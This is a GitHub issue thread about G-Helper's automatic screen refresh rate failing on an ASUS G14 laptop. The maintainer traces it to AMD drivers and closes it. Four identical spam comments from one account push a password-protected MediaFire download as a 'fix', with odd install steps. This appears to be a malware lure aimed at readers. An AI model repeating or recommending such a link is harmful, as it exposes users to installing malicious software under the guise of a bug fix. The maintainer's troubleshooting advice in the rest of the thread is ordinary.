### ISSUE TITLE
Auto change laptop screen refresh rate bugged

### ISSUE THREAD

**Issue by ipiegat** [seerge/g-helper#3024]
### Rules

- [X] I made myself familiar with the <a href='https://github.com/seerge/g-helper?tab=readme-ov-file'>Readme</a>, <a href='https://github.com/seerge/g-helper/wiki/FAQ'>FAQ</a> and <a href='https://github.com/seerge/g-helper/wiki/Troubleshooting'>Troubleshooting</a>.
- [X] I understand that, if insufficient information or no app logs will be provided, my issue will be closed without an answer.

### What's wrong?

I own a 2024 ASUS G14 (RTX 4070). This is my issue:

When going between battery and being plugged in, the screen won't change refresh rate when "Auto" is selected. Instead inside of "Advanced display" it will show a conflict between "Desktop mode" and "Active signal mode" (see picture). This issue is fixed upon resetting the computer; however, it comes back multiple times a day. I can easily tell when I plug/unplug the laptop and the screen doesn't flash black for a second or two like it should. Let me know if there is anything I can do. 

![image](https://github.com/user-attachments/assets/cf99a88b-dec3-48bb-ad9b-b0283be7ac94)

### How to reproduce the bug?

1. Unplug/plug laptop in with auto option on ghelper
2. If screen doesn't flash black, check advanced display

### Logs

[log.txt](https://github.com/user-attachments/files/16755890/log.txt)

### Device and Model

ASUS Zephryus G14 GA403UI

### Armoury Crate

Uninstalled

### Asus Services

None

### Version

0.184.0

### OS

Windows 11 23H2

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by seerge** [comment]
@ipiegat hello,

I was [answering this before](https://github.com/seerge/g-helper/discussions/2946). This is due to some changes in AMD drivers introduced recently (along with dynamic refresh rate option)

G-Helper changes refresh rate via the only possible method - WindowsAPI, and how it's handled depends on the windows and drivers. There is no other known ways to change refresh rate.

For my G14 20**22** even [Asus Smart Display Control](https://dlcdnets.asus.com/pub/ASUS/GamingNB/Image/Software/SoftwareandUtility/15237/ASUSSmartDisplayControl_V2.7.18_15237_1.zip) changes refresh rate with exactly same behavior. Can you check how it works on your device ?

**Comment by seerge** [comment]
@ipiegat any updates here ? Did you had a chance to test how Asus Smart Display Control behaves in this situation?

**Comment by ipiegat** [comment]
I can't tell a difference with Smart Display downloaded. It's still bugged. I downloaded it from the link you sent and enabled ASUS services in G-Helper. Am I supposed to do something else?

**Comment by seerge** [comment]
@ipiegat this is the app that changes refresh rates for Armory Crate setup. 

You can turn off `Auto` refresh rate in G-Helper (i.e. set either 60 or 120 so it won't interfere) and let Smart Display Control change refresh rates when you plug in / unplg.

If behavior is exactly the same - then it means asus utility is also doing exactly same as G-Helper can. And as I mentioned above - it's just how AMD driver behaves. So nothing can be done here.

**Comment by ipiegat** [comment]
Behavior is the exact same. I'm going to try and uninstall AMD drivers to see if that fixes it.

**Comment by seerge** [comment]
@ipiegat ok, good to know. On my G14 2022 (all AMD model) it behaves same.

Unfortunately there is no other (known) ways to set refresh rates, except using windows API. 
So unfortunately I can't change it anyhow (and asus utility also can't)

You can try older AMD drivers from asus website (or G-Helper's update section). But before that use [official AMD cleanup utility](https://github.com/seerge/g-helper/wiki/Troubleshooting#reinstalling-gpu-drivers).

I'm closing this as not planned as I can't do anything here :) 

Thanks
